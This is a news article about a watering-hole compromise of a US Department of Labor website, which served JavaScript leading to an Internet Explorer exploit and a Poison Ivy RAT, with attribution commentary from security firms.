In fact, the infection was discovered on April 30 by Invincea. “We received a tip that a site hosted by the United States Department of Labor (USDOL) had been compromised and was hosting malicious code,” blogged Anup Ghosh, the company’s founder and CEO yesterday. This was separately confirmed by Jaime Blasco, director at AlienVault. “During the last few hours,” he also blogged yesterday, “we have identified that one [of] the U.S. Department of Labor website[s] has been hacked and it is serving malicious code.”
The malicious code is Javascript that collects data from the visitor, sends the data to a remote C&C server, and redirects the visitor to that server. The malicious server then tries to exploit the CVE-2012-4792 vulnerability – a use-after-free flaw in Internet Explorer 6 to 8 that was first discovered in December 2012 and has since been fixed by Microsoft. If successful, it installs (according to Invincea) a variant of the Poison Ivy RAT.
AlienVault doesn’t specify that malware, but notes that, “The C&C protocol matches with a backdoor used by a known chinese actor called DeepPanda.” DeepPanda’s modus has been analyzed by Crowdstrike. “All of these samples reflect common toolmarks and tradecraft consistent with Chinese based actors who target various strategic interests of the United States including High Tech/Heavy Industry, Non-Governmental Organizations (NGOs), State/Federal Government, Defense Industrial Base (DIB), and organizations with vast economic interests.”
Invincea notes that the malware’s attack methodology “fits the enterprise user machine profile typical of large enterprise and government agencies.” Ghosh conjectures that this was a water hole attack designed compromise Department of Labor staff who might visit the compromised Department of Labor website. The purpose would be to get a foothold into the wider Labor department network.
If Ghosh is right and the malware is Poison Ivy delivered by a patched vulnerability to XP machines, then the obvious response is simply, how could this happen today? The reality, however, is that it works very well on large organizations. A slight change to the malware alters its signature and evades anti-virus detection. The vulnerability is patched, but only recently and there is an inevitable time lapse between the issue of a patch and its implementation; and the larger the organization, the longer the delay. And finally, many large organizations are not quick to update their operating systems; and XP remains very popular.
All of this seems to point to a very targeted attack attempting to get inside the Department of Labor. The Department of Labor itself has said nothing (at the time of writing this) about the incident; but it does appear that the compromised website is no longer hosting the Javascript. What isn’t known is whether the attackers gained their foothold and are now inside the network.